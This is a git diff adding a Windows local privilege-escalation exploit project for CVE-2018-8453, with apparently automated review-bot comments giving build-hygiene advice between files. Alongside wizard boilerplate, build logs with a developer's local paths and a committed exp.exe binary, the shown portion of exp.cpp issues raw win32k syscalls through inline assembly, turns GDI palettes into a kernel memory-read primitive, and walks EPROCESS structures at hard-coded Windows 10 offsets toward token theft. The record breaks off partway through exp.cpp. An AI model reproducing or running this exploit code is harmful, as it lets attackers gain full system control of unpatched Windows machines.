+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreadedDebug
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
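Review bot: the project file as rendered here shows only element values (Debug, Win32, the ProjectGuid, v140, 8.1, MultiThreadedDebug, Use/Create); the MSBuild element tags themselves are missing, so the configuration cannot be checked for well-formedness from this view. What the visible values do say is that the project targets the v140 toolset with the Windows 8.1 SDK and the static CRT, and that Debug|x64 and Release|x64 configurations are declared. Those two x64 configurations should be dropped: exp.cpp depends on `_asm` blocks (reading the PEB from fs:[0x30] in main), which the 64-bit MSVC compiler does not accept, so they can never build.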
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..aafdea0
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters
@@ -0,0 +1,36 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
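Review bot: every comment in this file is mojibake, so the wizard-generated boilerplate was committed in the machine's locale code page rather than UTF-8; either save it as UTF-8 with a BOM so MSVC reads it on any locale, or drop the precompiled-header pair altogether, since exp.cpp already includes stdio.h, windows.h and psapi.h directly and gains nothing from exp.pch.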
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
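Review bot: the two `#include` lines carry no file name in this rendering (the angle-bracketed names were lost), so the header as displayed does not compile and cannot be reviewed for what it actually pulls into the precompiled header; the comments are mojibake for the same encoding reason as stdafx.cpp. Restore the include targets and commit the file as UTF-8.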
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
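Review bot: the closing `#include` line has no target in this rendering either; the garbled comment above it still names SDKDDKVer.h as the intended header, so the include needs restoring before the file builds, and the comment text should be re-saved as UTF-8 like the rest of the wizard files.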
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch
new file mode 100644
index 0000000..e609501
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..4adff5a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo
new file mode 100644
index 0000000..a834f37
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe
new file mode 100644
index 0000000..1feac93
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db
new file mode 100644
index 0000000..f367b08
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db differ
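Review bot: Release/exp.exe is a compiled exploit binary committed alongside the source, together with Visual Studio state that belongs to one developer's machine (.vs/exp/v14/.suo, exp.VC.db and the ipch/ IntelliSense caches under exp_CUI). A prebuilt binary cannot be reviewed against the source it claims to come from and will be flagged by endpoint protection the moment the repository is cloned; remove it and the IDE caches from the commit and add them to a .gitignore (.vs/, *.suo, *.VC.db, ipch/, Debug/, Release/).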
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln
new file mode 100644
index 0000000..12f7ad4
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{28183B36-FF5A-4240-9BBC-60E767FADB82}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.ActiveCfg = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.Build.0 = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.ActiveCfg = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.Build.0 = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.ActiveCfg = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.Build.0 = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.ActiveCfg = Release|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log
new file mode 100644
index 0000000..317b5ab
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\debug\exp.pch
+c:\users\ze0r\desktop\exp\exp\debug\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\debug\vc140.idb
+c:\users\ze0r\desktop\exp\exp\debug\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\debug\exp.obj
+c:\users\ze0r\desktop\exp\debug\exp.ilk
+c:\users\ze0r\desktop\exp\debug\exp.exe
+c:\users\ze0r\desktop\exp\debug\exp.pdb
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.write.1.tlog
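Review bot: exp.Build.CppClean.log is build output and should not be in the commit; it also records the developer's local paths (c:\users\ze0r\desktop\exp\...) for every intermediate file, which is environment information with no place in a public repository. The same applies to the exp.log, *.tlog and exp.lastbuildstate entries that follow under both Debug/ and Release/; a .gitignore covering those two directories removes all of them at once.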
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log
new file mode 100644
index 0000000..bb56673
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log
@@ -0,0 +1,3 @@
+ exp.cpp
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Debug\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Debug\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj
new file mode 100644
index 0000000..75ef03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch
new file mode 100644
index 0000000..0bcf152
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..5a7107a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..02ec268
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..7714a95
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..16a0349
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|C:\Users\ze0r\Desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..3ac3afb
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..feae9a3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..d8a9c0e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj
new file mode 100644
index 0000000..8b0f3c4
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb
new file mode 100644
index 0000000..14a1e1c
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb
new file mode 100644
index 0000000..08c9762
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
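Review bot: this ReadMe.txt is the unmodified Visual Studio wizard template (it describes exp.vcxproj, exp.vcxproj.filters, exp.cpp and StdAfx.* as files the application wizard created) and says nothing about the program itself. Replace it, or extend the top-level README, with what a reader actually needs: the single Windows build the hard-coded EPROCESS offsets were taken from (the gConfig comment in exp.cpp says Win 10 15063 rs2 x86), that only the Win32 configuration builds, and how the exp_CUI and exp_webshell variants differ.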
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..dfcdb2b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\release\exp.obj
+c:\users\ze0r\desktop\exp\release\exp.exe
+c:\users\ze0r\desktop\exp\release\exp.ipdb
+c:\users\ze0r\desktop\exp\release\exp.iobj
+c:\users\ze0r\desktop\exp\release\exp.pdb
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log
new file mode 100644
index 0000000..319a91e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log
@@ -0,0 +1,8 @@
+ exp.cpp
+ 正在生成代码
+ 1 of 20 functions ( 5.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 3 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj
new file mode 100644
index 0000000..14c5143
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch
new file mode 100644
index 0000000..e281b4d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..647b9d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..6d7ddf0
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9d55f25
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..63114d5
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|C:\Users\ze0r\Desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..f3e4814
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..903949e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..b7c7941
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj
new file mode 100644
index 0000000..d800a72
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb
new file mode 100644
index 0000000..19fcad5
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp
new file mode 100644
index 0000000..6806763
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp
@@ -0,0 +1,404 @@
+#include "stdio.h"
+#include "stdafx.h"
+#include "windows.h"
+#include "psapi.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc, int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr, DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
